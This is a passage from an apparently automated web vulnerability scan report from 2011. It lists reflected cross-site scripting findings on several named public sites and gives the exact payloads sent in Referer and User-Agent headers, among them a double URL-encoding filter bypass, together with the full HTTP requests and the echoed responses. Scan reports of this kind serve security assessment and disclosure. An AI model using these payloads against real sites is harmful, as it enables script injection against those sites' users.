Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:08 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>a6601<script>alert(1)</script>44de2872daa</i>
...[SNIP]...
4.237. http://security.symantec.com/sscv6/vc_about.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/vc_about.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a189'-alert(1)-'64741e13be6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/vc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;
Referer: http://www.google.com/search?hl=en&q=6a189'-alert(1)-'64741e13be6

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 14758
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:12 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
_country";

   var lang = 'ie';

   var vendor = 'sym';

   var region = getRegion();

   var title = ': security check: virus scan: about';

   var strReferrer = 'http://www.google.com/search?hl=en&q=6a189'-alert(1)-'64741e13be6';

/* Give the campaign page a new title depending on referrer */
   if (title.indexOf("campaign") != -1) {
       if (strReferrer.indexOf("security_solutions.asp") != -1)
           title = ": security check:
...[SNIP]...
4.238. http://security.symantec.com/sscv6/vc_about.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://security.symantec.com
Path:   /sscv6/vc_about.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 90029<script>alert(1)</script>6a17c3c3905 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sscv6/vc_about.asp HTTP/1.1
Host: security.symantec.com
Accept: */*
Accept-Language: en
User-Agent: 90029<script>alert(1)</script>6a17c3c3905
Connection: close
Cookie: s_cc=true; bhPrevResults=bhjs=1&bhrf=http%3A%2F%2Fsecurity%2Esymantec%2Ecom%2Fsscv6%2FWelcomePage%2Easp; ASPSESSIONIDACBQSBBB=HLNNLMBEJCMEKFMOAHHDCMDL; s_vi=[CS]v1|26D5719C05013AA6-600001004018FC8E[CE]; s_sq=symanteccom%3D%2526pid%253Die%25253A%252520security%252520check%25253A%252520welcomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//security.symantec.com/sscv6/home.asp%25253Flangid%25253Die%252526venid%25253Dsym%252526close_parent%25253Dtrue%2526ot%253DA; bhResults=; bhCookieSess=; bhCookieSaveSess=1;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 13:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pics-label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" labels on "2000.01.31T17:50-0800" until "2004.05.31T17:50-0800" r (n 0 s 0 v 0 l 0))
Content-Length: 11484
Content-Type: text/html
Expires: Sun, 17 Apr 2011 13:03:09 GMT
Cache-control: private


<html>
<head>
<META HTTP-EQUIV = "Pragma" CONTENT="no-cache">

<link rel="stylesheet" href="sharedcontent/common/css/symantec.css" type="text/css">

<title>Symantec Security
...[SNIP]...
<i>90029<script>alert(1)</script>6a17c3c3905</i>
...[SNIP]...
4.239. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d69e"><script>alert(1)</script>720f70e7524 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886
Referer: http://www.google.com/search?hl=en&q=1d69e"><script>alert(1)</script>720f70e7524

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:59:02 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:59:02 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=WEBSEO1; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&PHRoutine=10&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15844

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1d69e"><script>alert(1)</script>720f70e7524">
...[SNIP]...
4.240. http://shop.ca.com/cgi-bin/order.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/order.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 723f6"><script>alert(1)</script>f15dc6132d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cgi-bin/order.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;
Referer: http://www.google.com/search?hl=en&q=723f6"><script>alert(1)</script>f15dc6132d3

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:54 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:55 GMT
Content-Length: 16188
Connection: close
Set-Cookie: Cart=PHPromo=N&PHRoutine=10&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=WEBSEO1; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=723f6"><script>alert(1)</script>f15dc6132d3">
...[SNIP]...
4.241. http://theautomaster.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eec29"><script>alert(1)</script>ab2b3c3131d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=eec29"><script>alert(1)</script>ab2b3c3131d

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:21:31 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=610c5daf0a0a002d004d9ebfb4592aff;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=1ts7yo8wpkkrt;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=eec29"><script>alert(1)</script>ab2b3c3131d&amp;20=theautomaster.com&amp;21=/index.htm&amp;50=610c5daf0a0a002d004d9ebfb4592aff&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&a
...[SNIP]...
4.242. http://theautomaster.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f244'-alert(1)-'7c9cfbad8fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2f244'-alert(1)-'7c9cfbad8fc

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 01:21:40 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=610c81c60a0a002d004d9ebf68559dc3;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=2t37vs2p32d2d;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=2f244'-alert(1)-'7c9cfbad8fc',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.243. http://theautomaster.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ba0"><script>alert(1)</script>b57f39e8c6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=e6ba0"><script>alert(1)</script>b57f39e8c6e

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 17:03:30 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=5f446ba50a0a002d004d9ebfd5c87dbe;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=82plfcqst74p5;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44186

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=e6ba0"><script>alert(1)</script>b57f39e8c6e&amp;20=theautomaster.com&amp;21=/index.htm&amp;50=5f446ba50a0a002d004d9ebfd5c87dbe&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&a
...[SNIP]...
4.244. http://theautomaster.com/index.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://theautomaster.com
Path:   /index.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ddc8'-alert(1)-'4ac342c68e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.htm HTTP/1.1
Host: theautomaster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=7ddc8'-alert(1)-'4ac342c68e7

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 17:03:34 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ssoid=5f447ce10a0a002d004d9ebfaaa376e2;path=/
Content-Type: text/html;charset=iso-8859-1
Set-Cookie: JSESSIONID=2n1t92d733bwk;path=/
Set-Cookie: lbpoolmember=1711345162.40475.0000; path=/
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Set-Cookie: ddcpoolid=CmsPoolE;path=/;
Content-Length: 44156

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms25.dealer.ddc p7070 -->

   <title>The Automaster of Shelburne, VT</title>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
tact: '',
               portal: '',
               sem: '',
               rlCookie: '',
               region: '',
               keyword: '',
               locality: 'en_US',
               host: '173.193.214.243',
               sessionReferrer: 'http://www.google.com/search?hl=en&q=7ddc8'-alert(1)-'4ac342c68e7',
               tcdkwid: '',
               tcdcmpid: '',
               tcdadid: '',
refId: '',
               platform: '',
               version: '',
               skin: '',
               templateExtra: '',
                       type: 10,
           extra: 'INDEX'
       };
               D
...[SNIP]...
4.245. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f4f87<script>alert(1)</script>06934d90575 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f4f87<script>alert(1)</script>06934d90575

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94445

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>06934d90575";addthis_title="f4f87<script>alert(1)</script>06934d90575 - 1 search";
var services = { 'naszaklasa':"Nasza-klasa", 'tuenti':"Tuenti", '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97a
...[SNIP]...
4.246. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea62e"><script>alert(1)</script>30ad732db68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ea62e"><script>alert(1)</script>30ad732db68

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94463

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=ea62e"><script>alert(1)</script>30ad732db68" />
...[SNIP]...
4.247. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527 was submitted in the Referer HTTP header. This input was echoed as ece2b";alert(1)//c7db6d31527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94421

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=ece2b%2522%253balert%25281%2529%252f%252fc7db6d31527";addthis_title="ece2b";alert(1)//c7db6d31527 - 1 search";
